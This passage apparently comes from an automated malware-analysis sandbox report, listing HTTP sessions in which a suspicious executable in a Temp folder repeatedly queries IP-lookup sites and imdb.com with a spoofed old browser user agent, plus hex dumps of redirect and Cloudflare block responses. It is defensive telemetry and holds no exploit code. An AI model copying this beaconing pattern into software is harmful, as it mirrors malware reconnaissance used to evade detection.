                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.246922970 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.246948957 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 38 31 66 30 65 32 66 61 35 34 32 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d30381f0e2fa542</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    36192.168.11.3049880172.67.155.175807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.541316986 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.686429024 CEST878INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:10 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:10 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XA4wkJgus%2FEdllf4kwJv2Nk7Io25NRxnIy4DtSTjMNhS87TdSY7fGz8HNlav5y1O1c0KwJP2%2Bl540tbXLAaxlQWWJfavvzUCo8BuICenFii%2BJVMDBQDG3i1HYCQ0WoAfHcaEZeHqBZIBPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30382e49863708-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    37192.168.11.3049882104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.856653929 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:12.037065029 CEST861INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:11 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:11 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n6b2kbeKGKroJ2RjkF%2Fk0SBqyS0yQETabFbHhJTBgt%2FcQuRKU69aSQTP%2BGQEigqg%2BNnptwkXJJJTIs8wiEKn3yAhQQPPgsgVxTK%2FDhLfkDlukZ%2Fkh8DAtSj2oKQyOS5Bw4RAVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038368e71a69b-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    38192.168.11.3049885104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.352721930 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.497003078 CEST863INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:14 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:14 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OO%2Fz4AB1GMYaiTDLhsRbs4IPn%2BukVdMTkkXwd8GX4a3mJjutOnTguL4xVBjzzIJ%2Fw6Yp00FplXj42%2FLlfYU43JG7FzlgI4DPBuM6dF1oPxaDa%2FBQMNGk6uS%2F%2FvWbWXjP5sytIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038461bce25e3-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    39192.168.11.3049887104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.648714066 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.792668104 CEST853INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:15 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:15 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4nHI3vgcDs%2FclhtrOU5JXEbkuE7HtEZ30NTsmiyHrJFlT5JoaM45iRw3VuSKsgNKwqD07tXKFBIdHoERwzd5J5aJ69zRR6oZ1Sn0yn59uALE04upxBJMZ%2FVXCCXTI3hAVHwntg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30384e3f2c4c01-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    40192.168.11.304988918.64.172.225807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.054218054 CEST172OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.imdb.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.182926893 CEST586INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Server: CloudFront
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:17 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Location: https://www.imdb.com/
                                                                                                                                                                                                                                                    X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                    Via: 1.1 990b3edf87805fa9b76a37723fae6ba2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: MIA3-P4
                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    X-Amz-Cf-Id: aUN6_wLwzWxQ5ksu83MNEBm6Y4IJ9HAv-mKMT2-wC-THDTugbWwjfg==
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    41192.168.11.3049892104.27.207.92807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.336213112 CEST178OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.whatismyip.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.490449905 CEST855INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:18 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:18 GMT
                                                                                                                                                                                                                                                    Location: https://www.whatismyip.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rh8ZzzS2mwuxUe6%2FvfvrcikTbZswLJ4C5Pk2fL8lKJbps1FIvRmZEIrTig9SSIm8SDQ1OVWN4tCjAt32KfBrahRBbWJ1g%2FU80jC9EuhZIDR33rPYGiNZSOWb%2FUySzQ8CfTIptg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30385ef9077481-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    42192.168.11.3049894172.67.155.175807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.648307085 CEST183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.showmyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.797949076 CEST878INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:19 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                    Content-Length: 167
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 14:40:19 GMT
                                                                                                                                                                                                                                                    Location: https://www.showmyipaddress.com/
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=08VZyWRiPIbxn8AFn2xC6vxXs55bW5xFIyC32bd5e7ebnj%2BcSk83G%2BN61fki1xELkEBs1MKttmIqPFXDZ0rCFeDeLAWvvVmPZ5EE9p9Tty8NexvIMgrVLnpYU2dwCS0q%2Ff1cPeTXkXflSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d3038673fcfda9b-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    43192.168.11.3049896104.19.223.79807864C:\Users\user\AppData\Local\Temp\zjisvko.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:20.967335939 CEST181OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                    Host: whatismyipaddress.com
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.108386040 CEST1289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                    Date: Tue, 15 Oct 2024 13:40:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Content-Length: 4526
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Referrer-Policy: same-origin
                                                                                                                                                                                                                                                    Cache-Control: max-age=15
                                                                                                                                                                                                                                                    Expires: Tue, 15 Oct 2024 13:40:36 GMT
                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=FBZ5FeMR7wf3rISjFLmDc0tPNN5B9I35CCWGeBJgFi4-1728999621-1.0.1.1-298NnIQqgeSTU1cH0rOuH6QS0cYt5xc8d.H8nnUWeeXaHzn4.YSG5I7PbSrFxc4fzVKDu6c_One0Gbx0CKgP9w; path=/; expires=Tue, 15-Oct-24 14:10:21 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8d30386f7cf52248-MIA
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.108458996 CEST1289INData Raw: 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66
                                                                                                                                                                                                                                                    Data Ascii: ="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigat
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.108761072 CEST1289INData Raw: 63 61 70 74 63 68 61 2d 63 6f 6e 74 61 69 6e 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                    Data Ascii: captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-tr
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.109281063 CEST1260INData Raw: 6c 64 22 3e 38 64 33 30 33 38 36 66 37 63 66 35 32 32 34 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65
                                                                                                                                                                                                                                                    Data Ascii: ld">8d30386f7cf52248</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-rev


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
